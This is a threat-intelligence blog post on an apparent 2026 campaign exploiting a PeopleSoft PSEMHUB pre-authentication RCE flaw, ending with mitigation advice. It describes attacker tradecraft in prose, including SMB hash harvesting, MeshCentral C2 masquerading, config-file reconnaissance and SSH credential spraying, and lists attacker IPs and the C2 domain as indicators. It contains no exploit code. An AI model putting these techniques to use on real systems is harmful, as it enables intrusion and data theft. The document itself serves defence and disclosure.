Oracle PeopleSoft Vulnerability CVE-2026-35273 Exploited by ShinyHunters

Posted on June 12, 2026 by TempMail Ninja

A critical cyber threat has sent shockwaves through the enterprise security landscape. Over the past several weeks, the notorious digital extortion syndicate known as ShinyHunters has aggressively weaponized a critical, previously unpatched Oracle PeopleSoft vulnerability to infiltrate network infrastructures, compromise massive datasets, and orchestrate high-stakes extortion campaigns against dozens of organizations worldwide. Classified as CVE-2026-35273, the zero-day flaw represents one of the most severe enterprise software security crises in recent memory, carrying a near-maximum CVSS severity score of 9.8. From May 27, 2026, to June 9, 2026, the attackers operated in total stealth, catching many institutions completely unprepared before Oracle released an emergency out-of-band advisory.

A joint threat brief compiled by Google Cloud’s Mandiant and the Google Threat Intelligence Group (GTIG) has illuminated the sheer scale of the offensive. According to investigators, the threat group—tracked analytically by security firms as UNC6240—focused its efforts primarily on educational institutions. Out of more than 100 global organizations identified as compromised or highly vulnerable, an astonishing 68 percent operate within the higher education sector. High-profile institutions, including the United Kingdom’s University of Nottingham, have already confirmed major data breaches stemming from this exploitation campaign, highlighting the severe real-world consequences of unpatched Enterprise Resource Planning (ERP) flaws.

Dissecting the Critical Oracle PeopleSoft Vulnerability (CVE-2026-35273)

To understand the devastating impact of this threat campaign, one must examine the specific technical mechanics of the Oracle PeopleSoft vulnerability. This vulnerability lies within the “Updates Environment Management” component of Oracle PeopleSoft, specifically targeting endpoints associated with the Environment Management Hub (PSEMHUB). Under normal operational circumstances, PSEMHUB acts as a centralized administrative utility that coordinates software updates, configuration tasks, and agent monitoring across an organization’s PeopleSoft environment.

The severity of this vulnerability stems from several key architectural factors:

  • Zero Authentication Required: An attacker does not need legitimate credentials, an active session, or any level of initial privilege to exploit the flaw. It is a pre-authentication vulnerability.
  • Remote Exploitation Over HTTP: The exploit can be executed remotely over standard HTTP or HTTPS protocols. If a PSEMHUB endpoint is exposed to the public internet, it can be compromised from anywhere in the world.
  • Trivial Interaction: The attack requires absolutely zero user interaction. No phishing email must be clicked, and no administrative session must be hijacked; the payload is delivered directly to the listening web service.
  • Maximum Severity Impact: A successful exploit grants the attacker remote code execution (RCE) capabilities, allowing them to gain total control of the underlying host hosting the PeopleSoft Enterprise PeopleTools platform.

The vulnerability primarily affects Oracle PeopleSoft Enterprise PeopleTools versions 8.61 and 8.62. Crucially, threat intelligence firms warn that legacy, unsupported versions of the software suite are also highly likely to be vulnerable, leaving organizations that run outdated ERP software in a state of extreme exposure. Behind the scenes, the underlying exploit payload leverages XMLDecoder deserialization flaws to write arbitrary files or force the host into initiating outbound SMB connections (TCP port 445) to harvest internal machine-account NetNTLM hashes. Because PeopleSoft applications run on top of Java-based Oracle WebLogic application servers, deserialization flaws of this nature represent a devastating vector, granting root-level or administrative system access directly through the web tier.

The Staging Ground Exposed: How OpSec Failures Revealed the Playbook

While UNC6240 operated with a high degree of technical coordination, the campaign’s full operational mechanics were laid bare due to a critical operational security (OpSec) failure. In early June 2026, security researcher @nahamike01 (Michael R.) publicly flagged open directories exposed on the internet by the threat actors. This discovery allowed GTIG and Mandiant to conduct an immediate, forensic triage of the attackers’ active staging infrastructure.

The investigation revealed that the attackers were hosting their payload toolkits across five sequential IP addresses:

  • 142.11.200.186
  • 142.11.200.187
  • 142.11.200.188
  • 142.11.200.189
  • 142.11.200.190

On each of these five staging servers, the threat actors ran an instance of Python’s built-in SimpleHTTP server on port 8888. Because these servers lacked directory listing restrictions, analysts could inspect their contents. Among the staged payloads was a shared, identical .bash_history file. This command history file acted as an unobstructed chronological log, providing investigators with the exact timeline and commands used to establish the attacker’s command-and-control (C2) network.

According to the logged timelines, the threat actors established their staging environments on May 27, 2026, at precisely 22:14 UTC. The first step was the installation of MeshCentral version 1.1.59, an open-source remote monitoring and management platform. Just eleven minutes later, at 22:25 UTC, the attackers executed the acme-client npm package. This automated the provisioning of valid Let’s Encrypt SSL/TLS certificates for their chosen domain, azurenetfiles.net. By utilizing legitimate certificates, the threat actors ensured that their C2 communication would blend seamlessly into encrypted corporate web traffic, bypassing standard network perimeter warnings.

Advanced C2 Masquerading and In-Network Reconnaissance

The staging directories hosted highly customized MeshCentral agents pre-configured to communicate with the C2 endpoint over WebSockets via the address wss://azurenetfiles.net:443/agent.ashx. The domain azurenetfiles.net was strategically selected to mimic legitimate Microsoft Azure NetApp Files services, a sophisticated masquerading technique designed to deceive network administrators reviewing DNS logs.

To evade endpoint detection and response (EDR) platforms, the Windows agents were disguised as safe system binaries under the following names:

  • meshagent32-azure-ops.exe
  • meshagent64-azure-ops.exe
  • meshagent64-v2.exe

For Linux environments, the attackers hosted an unconfigured Linux MeshCentral binary, passing configuration parameters dynamically via the command line to prevent static signature detection. Once initial access was secured via the unauthenticated HTTP exploit targeting PSEMHUB, the threat actors executed targeted internal reconnaissance using MeshCentral’s command-line tool, meshctrl.js.

The abuse of legitimate Remote Monitoring and Management (RMM) utilities like MeshCentral represents a growing trend known as “Bring Your Own Land” (BYOL). By deploying legitimate, signed administration tools rather than custom compiled malware, the threat actors successfully bypassed traditional antivirus defenses. Once active on the compromised host, they used meshctrl.js to perform a highly systematic auditing process, mapping out the internal network by:

  1. Parsing the local /etc/hosts files to identify neighboring servers.
  2. Inspecting WebLogic config.xml files to locate active database connections and application structures.
  3. Reading PeopleSoft application server configurations (specifically psappsrv.cfg) to extract domain details and system accounts.
  4. Enumerating active Network File System (NFS) storage locations to identify directories containing sensitive student, payroll, and corporate data.

Lateral Movement and Industrial-Scale Extortion

Once UNC6240 mapped out the surrounding environment, they moved rapidly to compromise adjacent systems. Rather than performing manual pivots, the attackers automated their lateral movement by deploying a customized Bash script named [victim_abbreviation]_fanout.sh directly to the /tmp directory of compromised hosts.

This script acted as a localized credential-spraying engine. It took the list of internal IP addresses and hostnames harvested from /etc/hosts and attempted automated SSH logins using a hardcoded array of common administrative credentials (targeting accounts such as psoft, oracle, and linuxadm). When a connection succeeded, the script automatically performed several operations: it logged administrative information, established persistent access, and placed a ransom marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT inside critical WebLogic and Process Scheduler directories.

With administrative access secured across multiple nodes, the threat actors began the systematic exfiltration of data. To optimize bandwidth and accelerate the process, stolen files were compressed on-the-fly using zstd utility algorithms. The compressed data was then exfiltrated via outbound SSH connections to external systems controlled by the group, including IP addresses 176.120.22.24 and 108.174.202.99.

By June 9, 2026, the exfiltration phase transitioned into active extortion. ShinyHunters began posting the names of targeted institutions on their dark web Data Leak Site (DLS). The University of Nottingham was among the first publicly confirmed victims. A spokesperson for the university admitted that a “significant amount of student data” had been accessed, with reports indicating that 40 gigabytes of personal directories, student records, billing logs, and academic documentation had been stolen and subsequently leaked online after the university declined to negotiate. For educational institutions, breaches of this magnitude trigger severe regulatory concerns, including potential violations of the UK/EU General Data Protection Regulation (GDPR) and the Family Educational Rights and Privacy Act (FERPA) in the United States, carrying massive financial penalties and reputational damage.

Emergency Mitigations and the CISA KEV Mandate

The swift escalation of this campaign prompted immediate intervention from federal cyber authorities. On June 12, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) officially added CVE-2026-35273 to its Known Exploited Vulnerabilities (KEV) Catalog, noting that the vulnerability has also been adopted by active ransomware operations. Under Binding Operational Directive (BOD) 26-04, all Federal Civilian Executive Branch (FCEB) agencies have been ordered to apply strict mitigations or entirely disable vulnerable services by June 15, 2026.

Because Oracle has primarily published mitigations rather than a widely accessible, fully automated out-of-band software patch, the burden of defense falls heavily on system administrators. Organizations running PeopleSoft Enterprise PeopleTools versions 8.61 or 8.62 must act immediately to reduce their attack surface.

The following emergency mitigation steps are strongly recommended by security experts:

  • Restrict Endpoint Exposure: Immediately block external, internet-exposed access to all PSEMHUB and integration gateway endpoints. Ensure that paths like /PSEMHUB/hub and /PSIGW/HttpListeningConnector are only accessible via internal corporate networks or secure Virtual Private Networks (VPNs).
  • Audit the Filesystem: Review the local PeopleSoft web-tier directories for unauthorized files. Specifically, search for unexpected assets under /webserv/[domain]/applications/peoplesoft/PSEMHUB.war/ and check for abnormal directories (such as logs, persistentstorage, or scratchpad) under the transaction paths.
  • Monitor Outbound Traffic: Inspect firewall logs and network flow data for unauthorized outbound SMB connections (TCP port 445) originating from PeopleSoft servers, which attackers use to harvest system NetNTLM hashes. Similarly, monitor for outbound SSH connections to known malicious IPs.
This entry was posted in Security & Privacy, Threat Alerts and tagged , , , . Bookmark the permalink.